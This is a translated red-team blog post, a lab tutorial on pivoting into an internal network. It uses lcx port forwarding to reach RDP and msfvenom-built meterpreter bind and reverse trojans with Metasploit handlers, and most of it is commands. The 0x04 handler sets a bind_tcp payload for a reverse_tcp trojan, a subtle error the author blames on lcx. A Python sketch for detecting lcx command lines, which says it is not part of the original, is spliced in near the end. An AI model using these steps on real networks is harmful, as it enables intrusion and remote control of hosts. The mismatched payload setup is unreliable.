lcx port forwarding

Table of Contents

0x01 forward port forwarding

0x02 reverse port forwarding

0x03 msf forward shell

0x04 msf reverse shell

Note:

Border machine (win08): 192.168.222.175

Internal network machine (win7): 192.168.222.137

msf machine (Ubuntu): 192.168.222.177

0x01 forward port forwarding

Run the port forwarding command on the border machine so that all traffic arriving on the given port is forwarded to the specified port of the specified IP in the internal network.

The firewall is turned off here; normally you would use netsh to open the port. For detailed steps, see the previous article [use netsh to port forwarding].

Here we forward all traffic on local port 53 to port 3389 of the internal machine, so that we can connect to it remotely:

lcx.exe -tran 53 192.168.222.137 3389

After running it, we confirm that the port is open.

Then we connect remotely from the local machine.

0x02 reverse port forwarding

If we only have a webshell on the target and there is no border host we can use, a reverse port forward can send the internal machine's traffic to our own host.

Note: here the border machine win08 stands in for our local host.

First, start listening on the local machine:

lcx.exe -listen 53 1234

Use netstat -ano to make sure the port is open.

Then run the following on the target machine (win7):

lcx.exe -slave 192.168.222.175 53 127.0.0.1 3389

This forwards the traffic of local port 3389 to port 53 on the win08 machine. If there is a border server that can be used, run the command on the border server and change the IP and port accordingly.

Then connect to the remote desktop locally (win08).

0x03 msf forward shell

Use an lcx forward port forward to connect to meterpreter inside the internal network.

First generate a trojan with msf:

msfvenom -p windows/x64/meterpreter/bind_tcp lport=53 -f exe >> 123.exe

Then, on the border machine, run an lcx forward port forward so that all traffic on port 53 is forwarded to meterpreter on the internal machine:

lcx.exe -tran 53 192.168.222.137 53

Then run our trojan on the internal machine.

Then go back to Ubuntu and start the listener, pointing it at port 53 on the border machine:

use exploit/multi/handler
set payload windows/x64/meterpreter/bind_tcp
set lport 53
set rhost 192.168.222.175
run


0x04 msf reverse shell

The reverse shell works on the same principle.

First generate our trojan; the connect-back IP and port here are those of the border machine:

msfvenom -p windows/x64/meterpreter/reverse_tcp lport=53 lhost=192.168.222.175  -f exe >> 123.exe

Then start listening on the border machine:

lcx.exe -listen 53 8888

Run our trojan on the internal machine.

Back on Ubuntu, start the listener:

use exploit/multi/handler
set payload windows/x64/meterpreter/bind_tcp
set lhost 192.168.222.175
set lport 8888
exploit -j

As you can see, the first attempt did not bring back a session; that is down to lcx, so just try it a couple more times.
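A detection sketch for the lcx command lines used in this article, added here as an example and not part of the original post: it matches the argument shapes of -tran, -listen and -slave in process-creation command lines (for example Sysmon Event ID 1, or Windows event 4688 with command-line auditing enabled), regardless of the binary's file name. The function names classify_lcx and scan, the file paths and the renamed binary svch0st.exe in the sample lines are constructed for illustration.

```python
import ipaddress

# lcx argument shapes as shown in this article (P = port, A = IPv4 address).
SHAPES = {"-tran": "PAP", "-listen": "PP", "-slave": "APAP"}

def _kind(token):
    """Classify one argument as a port ('P'), an IPv4 address ('A') or other ('?')."""
    if token.isascii() and token.isdigit() and 1 <= int(token) <= 65535:
        return "P"
    try:
        ipaddress.IPv4Address(token)
        return "A"
    except ValueError:
        return "?"

def classify_lcx(command_line):
    """Return a finding dict for an lcx-style argument shape, else None.
    The image name is ignored because the binary can simply be renamed."""
    argv = command_line.split()
    for i, tok in enumerate(argv):
        shape = SHAPES.get(tok.lower())
        if shape is None:
            continue
        args = argv[i + 1:i + 1 + len(shape)]
        if "".join(_kind(a) for a in args) != shape:
            continue
        ports = [int(a) for a in args if _kind(a) == "P"]
        return {
            "mode": tok.lower(),
            "ports": ports,
            "hosts": [a for a in args if _kind(a) == "A"],
            "rdp": 3389 in ports,      # RDP reachable through the forward
            "tcp_53": 53 in ports,     # DNS port carrying non-DNS TCP
        }
    return None

# Constructed process-creation command lines (assumed sample data, not real logs).
SAMPLE_LOG = [
    r"C:\Users\Public\lcx.exe -tran 53 192.168.222.137 3389",
    r"C:\Windows\Temp\svch0st.exe -slave 192.168.222.175 53 127.0.0.1 3389",
    r'"C:\Program Files\tool\x.exe" -listen 53 1234',
    r"C:\Windows\System32\netstat.exe -ano",
    r"C:\Windows\System32\ping.exe -n 4 192.168.222.137",
]

def scan(lines):
    """Return (line, finding) pairs for every matching line."""
    return [(line, f) for line in lines if (f := classify_lcx(line))]
```

A match on argument shape alone is a lead, not a verdict; correlate it with a new TCP listener on the named port (the netstat -ano check above) before escalating.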

First published on the public account: unintentional balderdash (wuxinmengyi)

This is a public account that records red team learning, notes and personal growth.


Origin www.cnblogs.com/wuxinmengyi/p/11598876.html